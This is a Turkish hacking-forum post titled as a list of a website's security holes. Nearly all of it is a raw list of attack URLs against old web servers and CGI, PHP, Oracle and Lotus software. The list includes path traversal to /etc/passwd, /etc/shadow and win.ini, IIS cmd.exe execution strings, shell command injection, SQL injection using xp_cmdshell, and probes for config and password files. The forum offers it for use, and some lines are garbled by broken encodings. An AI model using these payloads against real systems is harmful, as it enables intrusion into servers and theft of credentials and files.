BarbarHack

BarbarHack Web Sitesine Hosqeldiniz....!
 
AnasayfaSSSAramaÜye ListesiKullanıcı GruplarıKayıt OlGiriş yap

Paylaş | 
 

 bir sitenin güvenlik acıkları..

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
Admin
Admin


Mesaj Sayısı : 127
Kayıt tarihi : 20/03/08

MesajKonu: bir sitenin güvenlik acıkları..   C.tesi Mart 22, 2008 3:43 pm

Cevap: bir sitenin bütün açık kodları - 11-24-2007





/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:&l92;
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:&l92;
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:&l92;
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:&l92;
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/Web_Store/web_store.cgi?page=%00
/info.php
/info.php3
/phpinfo.php
/phpinfo.php3
/php/info.php
/php/info.php3
/php/phpinfo.php
/php/phpinfo.php3
/cgi-bin/phpinfo.php
/cgi-bin/phpinfo.php3
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/ssifilter/../../test.jsp
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/jsp/../../tst.txt
:8100//WEB-INF/
:8100//WEB-INF/web.xml
:8100//WEB-INF/webapp.properties
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
/servlet/ssifilter/../../test.jsp
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/servlet/jsp/../../tst.txt
//WEB-INF/
//WEB-INF/web.xml
//WEB-INF/webapp.properties
/cgi-bin/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/search.pl
/admin/includes/
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bb-replog.sh
/cgi-bin/bb-ack.sh
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/build.cgi
/build.cgi
/forums/list.php
/cgi-bin/html_page?TEMPLATE=main
/default.php%20%20
/default.php3%20%20
/index.php3%20%20
/index.php%20%20
/index.php3?vhosts=http://go.to
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host= &last_page=db2www0022.html&fn=db2www.html
/cgi-bin/db2www.exe/../../db2www.ini
/cgi-bin/db2www/../../db2www.ini
/db2_doc/html/db2srsen.exe
/+/
/+./
/++/
/++./
/includes/config.inc
/includes/config.php
/includes/config.php3
/includes/global.inc
/2600-cgi/ezmlm-cgi
/cgi-bin/ezmlm-cgi
/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mmstdol.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mmstdod.pl
/cgi-bin/mmstdol.pl
/mmstdod.cgi
/mmstdod.pl
/mmstdol.cgi
/mmstdol.pl
/."./."./Perl/eg/core/findtar
/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:&l92;InetPub&l92 ;wwwroot&l92;cmd.pl+&+.pl
/."./."./winnt/reapir/sam._%20.pl
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/ad.cgi?file=../../../../../../../../etc/hosts
/subscribe.pl
/cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=swoo pme@hotmail.com;ls%20-alsi&submit=run
/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/guestbook/dcguest.cgi
/cgi-bin/guestbook.pl
/cgi-bin/guestbook.data
/cgi-bin/guestbook.config
/cgi-bin/guestbook.cgi
/index.php3.%5c../..%5cconf/httpd.conf
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/submit.php
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
/cgi-bin/ezshopper2/loadpage.cgi?id+/
/cgi-bin/passcfg
/passcfg
/pls/orasso/orasso.wwsso_app_admin.ls_login
/pls/orasso/
/pls/admin_/?
/pls/admin_/help/..%255Cplsql.conf
/pls/demo/owa_util.signature
/pls/demo/%20owa_util.signature
/pls/demo/%0aowa_util.signature
/pls/demo/%08owa_util.signature
/pls/demo/owa_util.showsource?cname=owa_util
/pls/demo/owa_util.showsource?cname=owa_util
/pls/demo/owa_util.cellsprint?p_theQuery=select+*+from+sys.d ba_users&p_max_rows=10
/pls/demo/owa_util.listprint?p_theQuery=select+*+from+sys.db a_users&p_cname=&p_nsize=
/pls/demo/owa_util.show_query_columns?ctable=sys.dba_users
/Globals.jsa
/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
/xsql/java/xsql/demo/adhocsql/query.xsql?xml-stylesheet=none.xml&sql=select+*+from+sys.dba_user s
/soap/servlet/soaprouter
/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/dms0
/dms/DMSDump
/servlet/DMSDump
/servlet/Spy
/soap/servlet/Spy
/dms/AggreSpy
/oprocmgr-status
/oprocmgr-service
/demo/email/sendmail.jsp
/demo/basic/info/info.jsp
/fcgi-bin/echo
/fcgi-bin/echo2
/WebDB/admin_/
/cgi-bin/bsguest.cgi?email=x;ls
/cgi-bin/bslist.cgi?email=x;ls
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/ustorekeeper.pl?command=Yasak Kelime o&file=../../../../../bin/ls
/servlet/FormMailServlet?juhu.txt
/servlet/SurveyXMLServlet?jeaaa.txt
/servlet/WebPopServlet?config=uii.txt
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
/cgi-bin/webdriver
/cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/gettext.pl
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/ping.cgi
/cgi-bin/traceroute.cgi
/cgi-bin/finger.cgi
/cgi-bin/whois.cgi
/.nsf/../winnt/win.ini
/.box/../winnt/win.ini
/.ns4/../winnt/win.ini
/.nsf/../lotus/domino/notes.ini
/%00.nsf/../lotus/domino/notes.ini
/cgi-bin/bbs_forum.cgi?forum=test&read=../bbs_forum.cgi
/cgi-bin/debug.pl
/cgi-bin/debug.cgi
/mysql.class
/class/mysql.class
/inc/sendmail.inc
/cgi-bin/statsconfig.pl
/cgi-bin/stats.pl
/deletecontact.php?item_id=100+OR+TRUE+;
/cgi-bin/pi?page=document/show_file&id=
/./WEB-INF/
/./WEB-INF/web.xml
:8000/./WEB-INF/
:8000/./WEB-INF/web.xml
/cgi-bin/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
/user_info.php3?user_username=&l039;&l039;+or+admin _level=2+or+username%3d&l039;x&l039;+and+users.id= access.user_id;%00
/cgi-bin/user_info.php3?user_username=&l039;&l039;+or+admin _level=2+or+username%3d&l039;x&l039;+and+users.id= access.user_id;%00
/guestserver/guestserver.cgi?email=|ls|swoopme@hotmail.com
/cgi-bin/guestserver.cgi?email=|ls|swoopme@hotmail.com
/cfbin/board.cgi
/cgi-bin/board.cgi
/cgi-bin/getcomments.pl
/..&l92;..&l92;..&l92;..&l92;..&l92;..&l92;winnt&l 9 2;system32&l92;cmd.exe?/c+
/cgi-bin/form-to-mail.cgi?_out_file=mungo.dat&x=y
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts
/pals-cgi?palsAction=restart&documentName=pals-cgi
/cgi-bin/pals-cgi?palsAction=restart&documentName=pals-cgi
/opendir.php?requesturl=/etc/hosts
/ROADS/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/empower?DB=mungowitsch
/cgi-bin/way-board.cgi?db=way-board.cgi%00
/way-board/way-board.cgi?db=way-board.cgi%00
/cgi-bin/webspirs.cgi?sp.nextform=webspirs.cgi
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
/upload.html
/cgi/bin/test.txt;%20/bin/ls
/cgi-bin/test.txt;%20/bin/ls
/isapi/tstisapi.dll
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
/cgi-bin/adcycle/adcenter.cgi
/ext.dll
/cgi-bin/mailnews.cgi
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
/foldoc/template.cgi?template.cgi
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00
/cgi-bin/ikonboard.cgi
/cgi-bin/post-query?
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../etc/hosts
:8080/../../winnt/win.ini%00examples/jsp/hello.jsp
/../../winnt/win.ini%00examples/jsp/hello.jsp
:8080/index.js%2570
/index.js%2570
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts
/jsp_test/PoolMan.jsp
/PoolMan.jsp
:8080/.jsp/WEB-INF/classes/Env.java
/.jsp/WEB-INF/classes/Env.java
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/cgi-bin/nph-maillist.pl
/content.pl?group=49&id=140%20or%20id>0%20or%20ls_i d<1000
/cgi-bin/processit.pl
/quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_font_file=ariali.ttf
:6346/........../windows/win.ini
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts
/cgi-bin/a1stats/a1disp.cgi?|/bin/ls|
/%2e%2e/%2e%2e/%2e%2e/scandisk.log
/../scandisk.log
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:&l92;..&l92; winnt&l92;system32&l92;cmd.exe%20/c%20echo%20test>c:&l92;defcom.txt
/cgi-bin/sgdynamo.exe?HTNAME=default.htm
/pass?loginpass=a&redirect=0%2F&Submit=Login
/.../.../scandisk.log
/..../scandisk.log
/chip.ini
/ChipCfg.cfg
/ChipCfg
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/hosts%00
:9090//etc/shadow
/interscan/cgi-bin/FtpSave.dll?no
/interscan/cgi-bin/FtpSave.dll?yes
/interscan/cgi-bin/FtpSave.dll?I&l039;m%20here
/cgi-bin/CatalogMgr.pl?cartID=366&template=CatalogMgr.pl
/admin/?op=%c0
:631/admin/?op=%c0
/cgi-bin/ws_mail.cgi?kill=ng
:8000/file/%2E%2E/test1.mp3
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah
/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/vpopmail.php
/mail/vpopmail.php
/webmail/vpopmail.php
:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
:30001/SWEditServlet?station_path=Z&publication_id=2043&t emplate=../../../../../../../etc/hosts
/SWEditServlet?station_path=Z&publication_id=2043&t emplate=../../../../../../../etc/hosts
:30001/../../template/shared/indexTemplate.xml
/../../template/shared/indexTemplate.xml
/servlet/com.unify.ewave.servletexec.UploadServlet
/imp/compose.php
/compose.php
/AdLogin.pm
/adcycle/AdLogin.pm
/cgi-bin/story.cgi?next=
/webmacro/Page?db=tst&wmtemplate=ttt
/webmacro/org.paneris.paneris.controller.Page?db=tst&wmtempl ate=ttt
/mailman/edithtml
/cgi-bin/uncgi
/sbin/nscgi.cfg
/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin &userid=administrator
/session/pagecount?page=
:8080/../ssd.ini
/scripts/wsendmail.exe
/cgi-bin/wsendmail.exe
/scripts/toos/mkilog.exe
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng% 20int);EXEC+master..xp_cmdshell("cmd.exe+/c%20dir");--
/cgi-bin/sdbsearch.cgi?stichwort=keyword
/phpBBfolder/prefs.php?save=1&viewemail=1&l039;,user_level%3D&l 039;4&l039;%20where%20username%3D&l039;hoschi&l039 ;%23
/phpBB/bb_memberlist.php?sortby=user_regdate
/cgi-bin/mail.cgi
/scripts/mail.cgi
/cgi-bin/mailform.exe
/scripts/mailform.exe
/cgi-bin/mailsend.exe
/scripts/mailsend.exe
/cgi-bin/mailme.exe
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://tarsus33.forumv.biz
 
bir sitenin güvenlik acıkları..
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Arabam ve ona yaptıklarım
» İnsan Vücudu Mineral deposu

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
BarbarHack :: Security :: Security AçıkLarı-
Buraya geçin: